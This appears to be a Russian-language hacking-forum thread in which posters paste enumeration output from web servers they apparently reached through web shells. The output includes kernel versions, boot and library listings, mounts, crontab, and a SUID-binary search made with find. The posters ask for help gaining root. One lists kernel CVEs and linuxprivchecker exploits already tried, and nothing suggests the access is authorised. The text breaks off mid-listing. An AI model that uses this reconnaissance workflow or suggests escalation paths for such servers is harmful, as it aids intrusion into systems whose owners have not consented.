Mounted on /dev/sda1 231G 18G 202G 8% / none 1.9G 280K 1.9G 1% /dev none 1.9G 432K 1.9G 1% /dev/shm none 1.9G 116K 1.9G 1% /var/run none 1.9G 0 1.9G 0% /var/lock none 1.9G 0 1.9G 0% /lib/init/rw cat /etc/issue : Ubuntu 10.04.4 LTS \n \l кронтаб: см.далее cat /proc/version : Linux version 2.6.32-43-generic-pae (buildd@roseapple) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5.1) ) #97-Ubuntu SMP Wed Sep 5 16:59:17 UTC 2012 cat /proc/sys/vm/mmap_min_addr : 65536 pwd : /var/www/login_bak/style ( drwxr----- )[/B] [LIST][*]ls -la /usr/bin/staprun : (пусто) find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null : -rwsr-xr-x 1 root root 9724 Feb 19 2010 /sbin/mount.ecryptfs_private -rwsr-xr-- 1 root dip 273312 Mar 7 2010 /usr/sbin/pppd -rwsr-sr-x 1 libuuid libuuid 13848 Jan 21 2011 /usr/sbin/uuidd -rwsr-xr-x 1 root root 18056 Apr 20 2011 /usr/bin/pkexec -rwsr-xr-x 1 root root 127668 Jan 20 2011 /usr/bin/sudo -rwsr-sr-x 1 root root 9672 Jan 19 2012 /usr/bin/X -rwsr-xr-x 1 root lpadmin 13540 Sep 12 2011 /usr/bin/lppasswd -rwsr-xr-x 1 root root 127668 Jan 20 2011 /usr/bin/sudoedit -rwsr-sr-x 1 daemon daemon 42752 Jan 15 2011 /usr/bin/at -rwsr-xr-x 1 root root 52092 Mar 7 2010 /usr/bin/mtr -rwsr-xr-x 1 root root 26356 Feb 2 2010 /usr/bin/fping -rwsr-xr-x 1 root root 53812 Feb 15 2011 /usr/bin/gpasswd -rwsr-xr-x 1 root root 13820 Mar 12 2010 /usr/bin/arping -rwsr-xr-x 1 root root 37140 Feb 15 2011 /usr/bin/passwd -rwsr-xr-x 1 root root 13952 Mar 12 2010 /usr/bin/traceroute6.iputils -rwsr-xr-x 1 root root 31700 Feb 15 2011 /usr/bin/chsh -rwsr-xr-x 1 root root 26388 Feb 2 2010 /usr/bin/fping6 -rwsr-xr-x 1 root root 26784 Feb 15 2011 /usr/bin/newgrp -rwsr-xr-x 1 root root 36180 Feb 15 2011 /usr/bin/chfn -rwsr-xr-x 1 root root 5548 Nov 10 2009 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 9720 Apr 20 2011 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-xr-x 1 root root 9676 Jan 22 2011 /usr/lib/pt_chown -rwsr-xr-x 1 root root 13780 Apr 18 2010 /usr/lib/chromium-browser/chromium-browser-sandbox -rwsr-xr-x 1 root root 182464 Jun 17 2011 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 11019 Nov 21 2009 /usr/lib/kde4/libexec/fileshareset -rwsr-xr-x 1 root root 26456 Mar 12 2010 /bin/ping6 -rwsr-xr-x 1 root root 72188 Jan 21 2011 /bin/mount -rwsr-xr-x 1 root root 31100 Feb 15 2011 /bin/su -rwsr-xr-x 1 root root 34756 Mar 12 2010 /bin/ping -rwsr-xr-x 1 root root 26244 Feb 12 2011 /bin/fusermount -rwsr-xr-x 1 root root 51224 Jan 21 2011 /bin/umount -rwsr-xr-- 1 root messagebus 42492 Jul 23 2011 /lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 14024 Apr 6 2013 /opt/google/chrome/chrome-sandbox -rwsr-sr-x 1 root root 3676623 Jan 10 2010 /opt/AutoScan/bin/autoscan-network-daemon [/LIST] linuxprivchecker.py: http://my-files.ru/zf4cbx Опробованы все эксплоиты из linuxprivchecker, компилятся почти все, не отрабатывает ни один (без ошибок,просто нет результата). Из того, что в чекере нет: система должна быть подвержена CVE 2014-0196 и 2014-3153, но под первый нет эксплоита на мою версию ядра, эксплоит под вторую не работает. Нарыл две уязвимости этого года, но одна неюзабельна из-за отличающейся версии ОС, вторую (2015-3202) нет возможности проверить (чтобы узнать, сработало или нет, надо ждать логина в систему из-под рута. С таким админом его можно ждать вечно...). Хелп.
Подскажите пожалуйста по этому серверу Code: ***********uname -a Linux 2.6.32-431.29.2.el6.x86_64 #1 SMP Sun Jul 27 15:55:46 EDT 2014 x86_64 x86_64 x86_64 GNU/Linux **********ls -la /boot total 80526 dr-xr-xr-x. 5 root root 3072 Jul 31 04:15 . dr-xr-xr-x. 29 root root 4096 Jul 31 01:05 .. -rw-r--r-- 1 root root 171 Jul 27 2014 .vmlinuz-2.6.32-431.29.2.el6.x86_64.hmac -rw-r--r-- 1 root root 171 Mar 10 17:05 .vmlinuz-2.6.32-504.16.2.el6.x86_64.hmac -rw-r--r-- 1 root root 171 May 29 10:21 .vmlinuz-2.6.32-504.23.4.el6.x86_64.hmac -rw-r--r-- 1 root root 2519815 Jul 27 2014 System.map-2.6.32-431.29.2.el6.x86_64 -rw-r--r-- 1 root root 2545609 Mar 10 17:05 System.map-2.6.32-504.16.2.el6.x86_64 -rw-r--r-- 1 root root 2545975 May 29 10:21 System.map-2.6.32-504.23.4.el6.x86_64 -rw-r--r-- 1 root root 105200 Jul 27 2014 config-2.6.32-431.29.2.el6.x86_64 -rw-r--r-- 1 root root 106313 Mar 10 17:05 config-2.6.32-504.16.2.el6.x86_64 -rw-r--r-- 1 root root 106371 May 29 10:21 config-2.6.32-504.23.4.el6.x86_64 drwxr-xr-x. 3 root root 1024 Oct 25 2013 efi drwxr-xr-x. 2 root root 1024 Jul 21 01:48 grub -rw------- 1 root root 17153340 Nov 6 2014 initramfs-2.6.32-431.29.2.el6.x86_64.img -rw------- 1 root root 19351653 Jun 10 03:45 initramfs-2.6.32-504.16.2.el6.x86_64.img -rw------- 1 root root 19354839 Jul 21 01:48 initramfs-2.6.32-504.23.4.el6.x86_64.img -rw------- 1 root root 5598321 Apr 28 02:44 initrd-2.6.32-431.29.2.el6.x86_64kdump.img drwx------. 2 root root 12288 Oct 25 2013 lost+found -rw-r--r-- 1 root root 193945 Jul 27 2014 symvers-2.6.32-431.29.2.el6.x86_64.gz -rw-r--r-- 1 root root 200317 Mar 10 17:06 symvers-2.6.32-504.16.2.el6.x86_64.gz -rw-r--r-- 1 root root 200210 May 29 10:22 symvers-2.6.32-504.23.4.el6.x86_64.gz -rwxr-xr-x 1 root root 4132336 Jul 27 2014 vmlinuz-2.6.32-431.29.2.el6.x86_64 -rwxr-xr-x 1 root root 4153296 Mar 10 17:05 vmlinuz-2.6.32-504.16.2.el6.x86_64 -rwxr-xr-x 1 root root 4154992 May 29 10:21 vmlinuz-2.6.32-504.23.4.el6.x86_64 ***************lls -la --full-time /lib sh: lls: command not found *********************ls -la --full-time /lib total 3760 dr-xr-xr-x. 13 root root 4096 2015-07-21 01:47:08.711114108 -0400 . dr-xr-xr-x. 29 root root 4096 2015-07-31 01:05:31.931316783 -0400 .. drwxr-xr-x. 3 root root 4096 2015-01-12 08:24:24.000000000 -0500 alsa lrwxrwxrwx 1 root root 14 2015-01-22 01:39:24.006519825 -0500 cpp -> ../usr/bin/cpp drwxr-xr-x. 3 root root 4096 2015-01-22 01:41:16.608712599 -0500 crda drwxr-xr-x. 44 root root 12288 2015-07-21 01:45:25.921755167 -0400 firmware drwxr-xr-x. 3 root root 4096 2015-05-20 16:46:40.000000000 -0400 i686 drwxr-xr-x. 6 root root 4096 2013-10-25 03:57:52.000000000 -0400 kbd -rwxr-xr-x 1 root root 141140 2015-05-20 17:12:39.000000000 -0400 ld-2.12.so lrwxrwxrwx 1 root root 10 2015-07-21 01:47:08.518117237 -0400 ld-linux.so.2 -> ld-2.12.so -rwxr-xr-x 1 root root 7220 2015-05-20 17:12:36.000000000 -0400 libBrokenLocale-2.12.so lrwxrwxrwx 1 root root 23 2015-07-21 01:47:08.519117221 -0400 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so -rwxr-xr-x 1 root root 20372 2015-05-20 17:12:40.000000000 -0400 libSegFault.so -rwxr-xr-x 1 root root 13412 2015-05-20 17:12:39.000000000 -0400 libanl-2.12.so lrwxrwxrwx 1 root root 14 2015-07-21 01:47:08.521117189 -0400 libanl.so.1 -> libanl-2.12.so -rwxr-xr-x 1 root root 1902892 2015-05-20 17:12:38.000000000 -0400 libc-2.12.so lrwxrwxrwx 1 root root 12 2015-07-21 01:47:08.641115242 -0400 libc.so.6 -> libc-2.12.so -rwxr-xr-x 1 root root 190988 2015-05-20 17:12:37.000000000 -0400 libcidn-2.12.so lrwxrwxrwx 1 root root 15 2015-07-21 01:47:08.651115080 -0400 libcidn.so.1 -> libcidn-2.12.so -rwxr-xr-x 1 root root 38376 2015-05-20 17:12:40.000000000 -0400 libcrypt-2.12.so lrwxrwxrwx 1 root root 16 2015-07-21 01:47:08.653115048 -0400 libcrypt.so.1 -> libcrypt-2.12.so -rwxr-xr-x 1 root root 17892 2015-05-20 17:12:37.000000000 -0400 libdl-2.12.so lrwxrwxrwx 1 root root 13 2015-07-21 01:47:08.655115016 -0400 libdl.so.2 -> libdl-2.12.so -rw-r--r-- 1 root root 899 2015-01-28 17:12:07.000000000 -0500 libfreebl3.chk -rwxr-xr-x 1 root root 9604 2015-01-28 17:12:06.000000000 -0500 libfreebl3.so -rw-r--r-- 1 root root 899 2015-01-28 17:12:07.000000000 -0500 libfreeblpriv3.chk -rwxr-xr-x 1 root root 378504 2015-01-28 17:12:06.000000000 -0500 libfreeblpriv3.so -rwxr-xr-x 1 root root 120672 2014-09-01 09:11:34.000000000 -0400 libgcc_s-4.4.7-20120601.so.1 lrwxrwxrwx 1 root root 28 2015-01-22 01:41:30.798484873 -0500 libgcc_s.so.1 -> libgcc_s-4.4.7-20120601.so.1 -rwxr-xr-x 1 root root 200024 2015-05-20 17:12:36.000000000 -0400 libm-2.12.so lrwxrwxrwx 1 root root 12 2015-07-21 01:47:08.667114822 -0400 libm.so.6 -> libm-2.12.so -rwxr-xr-x 1 root root 113908 2015-05-20 17:12:39.000000000 -0400 libnsl-2.12.so lrwxrwxrwx 1 root root 14 2015-07-21 01:47:08.674114708 -0400 libnsl.so.1 -> libnsl-2.12.so -rwxr-xr-x 1 root root 40196 2015-05-20 17:12:35.000000000 -0400 libnss_compat-2.12.so lrwxrwxrwx 1 root root 21 2015-07-21 01:47:08.677114659 -0400 libnss_compat.so.2 -> libnss_compat-2.12.so -rwxr-xr-x 1 root root 25592 2015-05-20 17:12:40.000000000 -0400 libnss_dns-2.12.so lrwxrwxrwx 1 root root 18 2015-07-21 01:47:08.679114626 -0400 libnss_dns.so.2 -> libnss_dns-2.12.so -rwxr-xr-x 1 root root 58704 2015-05-20 17:12:40.000000000 -0400 libnss_files-2.12.so lrwxrwxrwx 1 root root 20 2015-07-21 01:47:08.682114578 -0400 libnss_files.so.2 -> libnss_files-2.12.so -rwxr-xr-x 1 root root 22136 2015-05-20 17:12:37.000000000 -0400 libnss_hesiod-2.12.so lrwxrwxrwx 1 root root 21 2015-07-21 01:47:08.684114546 -0400 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so -rwxr-xr-x 1 root root 49708 2015-05-20 17:12:37.000000000 -0400 libnss_nis-2.12.so lrwxrwxrwx 1 root root 18 2015-07-21 01:47:08.687114497 -0400 libnss_nis.so.2 -> libnss_nis-2.12.so -rwxr-xr-x 1 root root 58708 2015-05-20 17:12:38.000000000 -0400 libnss_nisplus-2.12.so lrwxrwxrwx 1 root root 22 2015-07-21 01:47:08.690114448 -0400 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so -rwxr-xr-x 1 root root 131220 2015-05-20 17:12:35.000000000 -0400 libpthread-2.12.so lrwxrwxrwx 1 root root 18 2015-07-21 01:47:08.698114318 -0400 libpthread.so.0 -> libpthread-2.12.so -rwxr-xr-x 1 root root 103384 2015-05-20 17:12:39.000000000 -0400 libresolv-2.12.so lrwxrwxrwx 1 root root 17 2015-07-21 01:47:08.705114205 -0400 libresolv.so.2 -> libresolv-2.12.so -rwxr-xr-x 1 root root 39708 2015-05-20 17:12:36.000000000 -0400 librt-2.12.so lrwxrwxrwx 1 root root 13 2015-07-21 01:47:08.708114156 -0400 librt.so.1 -> librt-2.12.so -rwxr-xr-x 1 root root 31616 2015-05-20 17:12:41.000000000 -0400 libthread_db-1.0.so lrwxrwxrwx 1 root root 19 2015-07-21 01:47:08.710114124 -0400 libthread_db.so.1 -> libthread_db-1.0.so -rwxr-xr-x 1 root root 12788 2015-05-20 17:12:40.000000000 -0400 libutil-2.12.so lrwxrwxrwx 1 root root 15 2015-07-21 01:47:08.710114124 -0400 libutil.so.1 -> libutil-2.12.so drwxr-xr-x. 2 root root 4096 2013-10-25 13:09:41.000000000 -0400 lsb dr-xr-xr-x. 5 root root 4096 2015-07-21 01:47:10.410086560 -0400 modules drwxr-xr-x. 3 root root 4096 2015-07-21 01:47:08.730113800 -0400 rtkaio drwxr-xr-x. 2 root root 4096 2014-07-17 11:36:23.000000000 -0400 security drwxr-xr-x. 6 root root 4096 2013-10-25 03:57:01.000000000 -0400 terminfo drwxr-xr-x. 5 root root 4096 2015-01-22 01:39:34.385353241 -0500 udev ********************mount /dev/mapper/VolGroup-lv_root on / type ext4 (rw) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) tmpfs on /dev/shm type tmpfs (rw) /dev/sda1 on /boot type ext4 (rw) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) /etc/named on /var/named/chroot/etc/named type none (rw,bind) /var/named on /var/named/chroot/var/named type none (rw,bind) /usr/lib64/bind on /var/named/chroot/usr/lib64/bind type none (rw,bind) *************************df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/VolGroup-lv_root 909G 587G 276G 69% / tmpfs 16G 1.1G 15G 7% /dev/shm /dev/sda1 243M 86M 145M 38% /boot sh-4.1$ cat /etc/issue cat /etc/issue Red Hat Enterprise Linux Server release 6.6 (Santiago) Kernel \r on an \m *******************cat /etc/crontab SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root HOME=/ # For details see man 4 crontabs # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed ****************ls -la cron.d ls: cannot access cron.d: No such file or directory *************ls -la cron.hourly ls: cannot access cron.hourly: No such file or directory **********************ls -la cron.monthly ls: cannot access cron.monthly: No such file or directory ********************ls -la cron.weekly ls: cannot access cron.weekly: No such file or directory ******************cat /proc/version Linux version 2.6.32-431.29.2.el6.x86_64 ([email protected]) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) ) #1 SMP Sun Jul 27 15:55:46 EDT 2014 ******************cat /proc/sys/vm/mmap_min_addr 4096 sh-4.1$ pwd pwd /var/www/vhost//httpdoc/lib ************ls -la /usr/bin/staprun ---s--x--- 1 root stapusr 183072 Jun 23 2014 /usr/bin/staprun ****************** find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/nul sh: /dev/nul: Permission denied
Подскажите пожалуйста, можно ли рутить этот сервер? $ uname -a 2>&1 Code: Linux zdes byl hostname 3.13.0-40-generic #69-Ubuntu SMP Thu Nov 13 17:53:56 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux $ ls -la /boot 2>&1 Code: total 652860 drwxr-xr-x 3 root root 12288 Jun 20 08:15 . drwxr-xr-x 24 root root 4096 Jun 16 08:07 .. -rw------- 1 root root 3372643 May 3 2014 System.map-3.13.0-24-generic -rw------- 1 root root 3378267 Jun 5 2014 System.map-3.13.0-29-generic -rw------- 1 root root 3378641 Jul 5 2014 System.map-3.13.0-30-generic -rw------- 1 root root 3381262 Jul 15 2014 System.map-3.13.0-32-generic -rw------- 1 root root 3381262 Jul 29 2014 System.map-3.13.0-33-generic -rw------- 1 root root 3381262 Aug 13 2014 System.map-3.13.0-34-generic -rw------- 1 root root 3386444 Aug 15 2014 System.map-3.13.0-35-generic -rw------- 1 root root 3386479 Sep 4 2014 System.map-3.13.0-36-generic -rw------- 1 root root 3386945 Sep 23 2014 System.map-3.13.0-37-generic -rw------- 1 root root 3386936 Oct 28 2014 System.map-3.13.0-39-generic -rw------- 1 root root 3387231 Nov 13 2014 System.map-3.13.0-40-generic -rw------- 1 root root 3388792 Nov 25 2014 System.map-3.13.0-41-generic -rw------- 1 root root 3388760 Dec 9 2014 System.map-3.13.0-43-generic -rw------- 1 root root 3388834 Dec 16 2014 System.map-3.13.0-44-generic -rw------- 1 root root 3389458 Mar 11 01:43 System.map-3.13.0-46-generic -rw------- 1 root root 3389235 Mar 12 16:52 System.map-3.13.0-48-generic -rw------- 1 root root 3389437 Apr 11 02:05 System.map-3.13.0-49-generic -rw------- 1 root root 3389875 Apr 15 18:03 System.map-3.13.0-51-generic -rw------- 1 root root 3389875 May 4 10:09 System.map-3.13.0-52-generic -rw------- 1 root root 3390132 May 20 16:11 System.map-3.13.0-53-generic -rw------- 1 root root 3390881 May 27 01:11 System.map-3.13.0-54-generic -rw------- 1 root root 3390881 Jun 18 06:03 System.map-3.13.0-55-generic -rw-r--r-- 1 root root 1158016 May 3 2014 abi-3.13.0-24-generic -rw-r--r-- 1 root root 1161764 Jun 5 2014 abi-3.13.0-29-generic -rw-r--r-- 1 root root 1162257 Jul 5 2014 abi-3.13.0-30-generic -rw-r--r-- 1 root root 1162712 Jul 15 2014 abi-3.13.0-32-generic -rw-r--r-- 1 root root 1162712 Jul 29 2014 abi-3.13.0-33-generic -rw-r--r-- 1 root root 1162712 Aug 13 2014 abi-3.13.0-34-generic -rw-r--r-- 1 root root 1163858 Aug 15 2014 abi-3.13.0-35-generic -rw-r--r-- 1 root root 1163858 Sep 4 2014 abi-3.13.0-36-generic -rw-r--r-- 1 root root 1164489 Sep 23 2014 abi-3.13.0-37-generic -rw-r--r-- 1 root root 1164547 Oct 28 2014 abi-3.13.0-39-generic -rw-r--r-- 1 root root 1164509 Nov 13 2014 abi-3.13.0-40-generic -rw-r--r-- 1 root root 1164720 Nov 25 2014 abi-3.13.0-41-generic -rw-r--r-- 1 root root 1164720 Dec 9 2014 abi-3.13.0-43-generic -rw-r--r-- 1 root root 1164720 Dec 16 2014 abi-3.13.0-44-generic -rw-r--r-- 1 root root 1164852 Mar 11 01:43 abi-3.13.0-46-generic -rw-r--r-- 1 root root 1164723 Mar 12 16:52 abi-3.13.0-48-generic -rw-r--r-- 1 root root 1164723 Apr 11 02:05 abi-3.13.0-49-generic -rw-r--r-- 1 root root 1164671 Apr 15 18:03 abi-3.13.0-51-generic -rw-r--r-- 1 root root 1164671 May 4 10:09 abi-3.13.0-52-generic -rw-r--r-- 1 root root 1164671 May 20 16:11 abi-3.13.0-53-generic -rw-r--r-- 1 root root 1164806 May 27 01:11 abi-3.13.0-54-generic -rw-r--r-- 1 root root 1164806 Jun 18 06:03 abi-3.13.0-55-generic -rw-r--r-- 1 root root 165510 May 3 2014 config-3.13.0-24-generic -rw-r--r-- 1 root root 165544 Jun 5 2014 config-3.13.0-29-generic -rw-r--r-- 1 root root 165576 Jul 5 2014 config-3.13.0-30-generic -rw-r--r-- 1 root root 165611 Jul 15 2014 config-3.13.0-32-generic -rw-r--r-- 1 root root 165611 Jul 29 2014 config-3.13.0-33-generic -rw-r--r-- 1 root root 165611 Aug 13 2014 config-3.13.0-34-generic -rw-r--r-- 1 root root 165652 Aug 15 2014 config-3.13.0-35-generic -rw-r--r-- 1 root root 165671 Sep 4 2014 config-3.13.0-36-generic -rw-r--r-- 1 root root 165712 Sep 23 2014 config-3.13.0-37-generic -rw-r--r-- 1 root root 165712 Oct 28 2014 config-3.13.0-39-generic -rw-r--r-- 1 root root 165745 Nov 13 2014 config-3.13.0-40-generic -rw-r--r-- 1 root root 165745 Nov 25 2014 config-3.13.0-41-generic -rw-r--r-- 1 root root 165745 Dec 9 2014 config-3.13.0-43-generic -rw-r--r-- 1 root root 165748 Dec 16 2014 config-3.13.0-44-generic -rw-r--r-- 1 root root 165748 Mar 11 01:43 config-3.13.0-46-generic -rw-r--r-- 1 root root 165773 Mar 12 16:52 config-3.13.0-48-generic -rw-r--r-- 1 root root 165773 Apr 11 02:05 config-3.13.0-49-generic -rw-r--r-- 1 root root 165762 Apr 15 18:03 config-3.13.0-51-generic -rw-r--r-- 1 root root 165762 May 4 10:09 config-3.13.0-52-generic -rw-r--r-- 1 root root 165762 May 20 16:11 config-3.13.0-53-generic -rw-r--r-- 1 root root 165762 May 27 01:11 config-3.13.0-54-generic -rw-r--r-- 1 root root 165762 Jun 18 06:03 config-3.13.0-55-generic drwxr-xr-x 5 root root 4096 Jun 20 08:15 grub -rw-r--r-- 1 root root 19692919 Jun 25 2014 initrd.img-3.13.0-24-generic -rw-r--r-- 1 root root 19693496 Jun 25 2014 initrd.img-3.13.0-29-generic -rw-r--r-- 1 root root 19802843 Jul 10 2014 initrd.img-3.13.0-30-generic -rw-r--r-- 1 root root 19805892 Jul 30 2014 initrd.img-3.13.0-32-generic -rw-r--r-- 1 root root 19806330 Aug 12 2014 initrd.img-3.13.0-33-generic -rw-r--r-- 1 root root 19807084 Aug 14 2014 initrd.img-3.13.0-34-generic -rw-r--r-- 1 root root 19814700 Aug 29 2014 initrd.img-3.13.0-35-generic -rw-r--r-- 1 root root 19827146 Sep 23 2014 initrd.img-3.13.0-36-generic -rw-r--r-- 1 root root 19826914 Oct 9 2014 initrd.img-3.13.0-37-generic -rw-r--r-- 1 root root 19826798 Oct 30 2014 initrd.img-3.13.0-39-generic -rw-r--r-- 1 root root 19831562 Nov 25 2014 initrd.img-3.13.0-40-generic -rw-r--r-- 1 root root 19857194 Dec 11 2014 initrd.img-3.13.0-41-generic -rw-r--r-- 1 root root 19858798 Dec 12 2014 initrd.img-3.13.0-43-generic -rw-r--r-- 1 root root 19860064 Jan 13 2015 initrd.img-3.13.0-44-generic -rw-r--r-- 1 root root 19863695 Mar 12 07:53 initrd.img-3.13.0-46-generic -rw-r--r-- 1 root root 19862856 Mar 24 07:52 initrd.img-3.13.0-48-generic -rw-r--r-- 1 root root 19864189 Apr 14 08:09 initrd.img-3.13.0-49-generic -rw-r--r-- 1 root root 19862129 Apr 30 08:11 initrd.img-3.13.0-51-generic -rw-r--r-- 1 root root 19865264 May 7 08:07 initrd.img-3.13.0-52-generic -rw-r--r-- 1 root root 19864608 May 22 08:48 initrd.img-3.13.0-53-generic -rw-r--r-- 1 root root 19864503 Jun 11 08:24 initrd.img-3.13.0-54-generic -rw-r--r-- 1 root root 19863440 Jun 20 08:15 initrd.img-3.13.0-55-generic -rw-r--r-- 1 root root 176500 Mar 12 2014 memtest86+.bin -rw-r--r-- 1 root root 178176 Mar 12 2014 memtest86+.elf -rw-r--r-- 1 root root 178680 Mar 12 2014 memtest86+_multiboot.bin -rw------- 1 root root 5776416 May 3 2014 vmlinuz-3.13.0-24-generic -rw------- 1 root root 5792544 Jun 5 2014 vmlinuz-3.13.0-29-generic -rw------- 1 root root 5792608 Jul 5 2014 vmlinuz-3.13.0-30-generic -rw------- 1 root root 5798112 Jul 15 2014 vmlinuz-3.13.0-32-generic -rw------- 1 root root 5798688 Jul 29 2014 vmlinuz-3.13.0-33-generic -rw------- 1 root root 5797728 Aug 13 2014 vmlinuz-3.13.0-34-generic -rw------- 1 root root 5806368 Aug 15 2014 vmlinuz-3.13.0-35-generic -rw------- 1 root root 5806848 Sep 4 2014 vmlinuz-3.13.0-36-generic -rw------- 1 root root 5808832 Sep 23 2014 vmlinuz-3.13.0-37-generic -rw------- 1 root root 5808544 Oct 28 2014 vmlinuz-3.13.0-39-generic -rw------- 1 root root 5808960 Nov 13 2014 vmlinuz-3.13.0-40-generic -rw------- 1 root root 5814112 Nov 25 2014 vmlinuz-3.13.0-41-generic -rw------- 1 root root 5814080 Dec 9 2014 vmlinuz-3.13.0-43-generic -rw------- 1 root root 5814496 Dec 16 2014 vmlinuz-3.13.0-44-generic -rw------- 1 root root 5814592 Mar 11 01:43 vmlinuz-3.13.0-46-generic -rw------- 1 root root 5815680 Mar 12 16:52 vmlinuz-3.13.0-48-generic -rw------- 1 root root 5815392 Apr 11 02:05 vmlinuz-3.13.0-49-generic -rw------- 1 root root 5818368 Apr 15 18:03 vmlinuz-3.13.0-51-generic -rw------- 1 root root 5818592 May 4 10:09 vmlinuz-3.13.0-52-generic -rw------- 1 root root 5821152 May 20 16:11 vmlinuz-3.13.0-53-generic -rw------- 1 root root 5821664 May 27 01:11 vmlinuz-3.13.0-54-generic -rw------- 1 root root 5821984 Jun 18 06:03 vmlinuz-3.13.0-55-generic ls -la --full-time /lib 2>&1 Code: total 312 drwxr-xr-x 23 root root 4096 2015-02-27 08:01:04.121244740 +0500 . drwxr-xr-x 24 root root 4096 2015-06-16 08:07:45.004506276 +0500 .. drwxr-xr-x 2 root root 4096 2014-11-21 07:40:33.676606953 +0500 apparmor lrwxrwxrwx 1 root root 21 2014-07-11 16:04:40.744028161 +0500 cpp -> /etc/alternatives/cpp drwxr-xr-x 3 root root 4096 2014-06-24 11:04:14.153311413 +0500 crda drwxr-xr-x 81 root root 20480 2015-06-16 08:07:19.308506965 +0500 firmware drwxr-xr-x 2 root root 4096 2014-06-24 11:08:09.613305094 +0500 hdparm drwxr-xr-x 2 root root 12288 2015-02-27 08:01:04.121244740 +0500 i386-linux-gnu drwxr-xr-x 2 root root 4096 2014-06-27 11:51:14.108394221 +0500 ifupdown drwxr-xr-x 2 root root 4096 2014-07-30 11:27:25.309402444 +0500 init -rwxr-xr-x 1 root root 71512 2013-12-24 07:51:15.000000000 +0500 klibc-P2s_k-gf23VtrGgO2_4pGkQgwMY.so lrwxrwxrwx 1 root root 25 2015-02-25 21:58:43.000000000 +0500 ld-linux.so.2 -> i386-linux-gnu/ld-2.19.so lrwxrwxrwx 1 root root 17 2014-01-09 03:32:00.000000000 +0500 libip4tc.so.0 -> libip4tc.so.0.1.0 -rw-r--r-- 1 root root 27392 2014-01-09 03:32:05.000000000 +0500 libip4tc.so.0.1.0 lrwxrwxrwx 1 root root 17 2014-01-09 03:32:00.000000000 +0500 libip6tc.so.0 -> libip6tc.so.0.1.0 -rw-r--r-- 1 root root 31520 2014-01-09 03:32:05.000000000 +0500 libip6tc.so.0.1.0 lrwxrwxrwx 1 root root 16 2014-01-09 03:32:00.000000000 +0500 libiptc.so.0 -> libiptc.so.0.0.0 -rw-r--r-- 1 root root 5816 2014-01-09 03:32:05.000000000 +0500 libiptc.so.0.0.0 lrwxrwxrwx 1 root root 20 2014-01-09 03:32:00.000000000 +0500 libxtables.so.10 -> libxtables.so.10.0.0 -rw-r--r-- 1 root root 47712 2014-01-09 03:32:06.000000000 +0500 libxtables.so.10.0.0 drwxr-xr-x 3 root root 4096 2014-06-24 11:03:45.029312194 +0500 lsb drwxr-xr-x 2 root root 4096 2015-06-20 08:14:04.183221689 +0500 modprobe.d drwxr-xr-x 24 root root 4096 2015-06-16 08:07:17.752507007 +0500 modules drwxr-xr-x 2 root root 4096 2015-05-22 08:46:32.470408887 +0500 modules-load.d drwxr-xr-x 3 root root 4096 2014-06-24 11:03:45.029312194 +0500 plymouth drwxr-xr-x 3 root root 4096 2014-06-24 11:10:30.041301325 +0500 recovery-mode drwxr-xr-x 2 root root 4096 2014-06-27 11:51:03.188394514 +0500 resolvconf drwxr-xr-x 2 root root 4096 2014-07-11 15:54:31.320044515 +0500 security drwxr-xr-x 3 root root 4096 2014-07-10 17:19:11.242226794 +0500 systemd drwxr-xr-x 15 root root 4096 2014-06-24 11:03:45.029312194 +0500 terminfo drwxr-xr-x 4 root root 4096 2014-07-11 15:54:50.304044005 +0500 udev drwxr-xr-x 2 root root 4096 2014-06-24 11:12:34.149297995 +0500 ufw drwxr-xr-x 4 root root 12288 2015-06-12 08:11:58.733773878 +0500 x86_64-linux-gnu drwxr-xr-x 2 root root 4096 2014-06-24 11:08:13.173304998 +0500 xtables ls -la --full-time /lib64 2>&1 Code: total 8 drwxr-xr-x 2 root root 4096 2015-02-27 08:01:05.833244694 +0500 . drwxr-xr-x 24 root root 4096 2015-06-16 08:07:45.004506276 +0500 .. lrwxrwxrwx 1 root root 32 2015-02-25 21:56:31.000000000 +0500 ld-linux-x86-64.so.2 -> /lib/x86_64-linux-gnu/ld-2.19.so $ mount 2>&1 Code: /dev/md0 on / type ext4 (rw,errors=remount-ro) proc on /proc type proc (rw,noexec,nosuid,nodev) sysfs on /sys type sysfs (rw,noexec,nosuid,nodev) none on /sys/fs/cgroup type tmpfs (rw) none on /sys/fs/fuse/connections type fusectl (rw) none on /sys/kernel/debug type debugfs (rw) none on /sys/kernel/security type securityfs (rw) udev on /dev type devtmpfs (rw,mode=0755) devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620) tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755) none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880) none on /run/shm type tmpfs (rw,nosuid,nodev) none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755) none on /sys/fs/pstore type pstore (rw) /dev/md1 on /opt type ext4 (rw,usrquota) systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd) $ df -h 2>&1 Code: Filesystem Size Used Avail Use% Mounted on /dev/md0 459G 215G 221G 50% / none 4.0K 0 4.0K 0% /sys/fs/cgroup udev 3.8G 4.0K 3.8G 1% /dev tmpfs 768M 1.8M 767M 1% /run none 5.0M 0 5.0M 0% /run/lock none 3.8G 16K 3.8G 1% /run/shm none 100M 0 100M 0% /run/user /dev/md1 